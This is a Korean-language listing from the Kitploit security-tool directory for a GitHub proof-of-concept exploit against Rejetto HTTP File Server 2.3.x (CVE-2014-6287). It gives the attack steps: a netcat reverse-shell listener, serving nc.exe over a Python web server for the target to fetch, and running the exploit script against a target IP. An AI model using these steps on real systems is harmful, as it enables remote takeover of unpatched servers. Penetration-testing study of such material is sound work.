Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287 — 이 저장소에는 Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution에 대한 상세한 설명과 동작하는 PoC가 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/rahisec/rejetto-http-file-server-2.3.x-rce-exploit-cve-2014-6287
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubrahisec/rejetto-http-file-server-2.3.x-rce-exploit-cve-2014-6287

rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287

이 저장소에는 Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution에 대한 상세한 설명과 동작하는 PoC가 포함되어 있습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1년 전아직 검토되지 않음

rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287

이 저장소에는 Rejetto HTTP File Server (HFS) 2.3.x - 원격 명령 실행(Remote Command Execution)에 대한 상세한 설명과 동작하는 PoC가 포함되어 있습니다.

구성:

Netcat 리스너를 생성하세요.

root@kitploit:~
nc -lnvp 1234

공격자 IP를 자신의 IP와 포트로 변경하세요.

image.png

또한 nc.exe가 존재하는 동일한 디렉토리에 HTTP 파일 서버를 생성하세요.

root@kitploit:~
python -m http.server 80

사용법:

root@kitploit:~
python exploit.py <target-ip> <target-port>

image.png

참고: 리버스 셸을 얻으려면 페이로드를 여러 번 실행해야 할 수 있습니다.

참고 자료


https://www.exploit-db.com/exploits/39161

https://www.exploit-db.com/exploits/34668

https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

도구 다운로드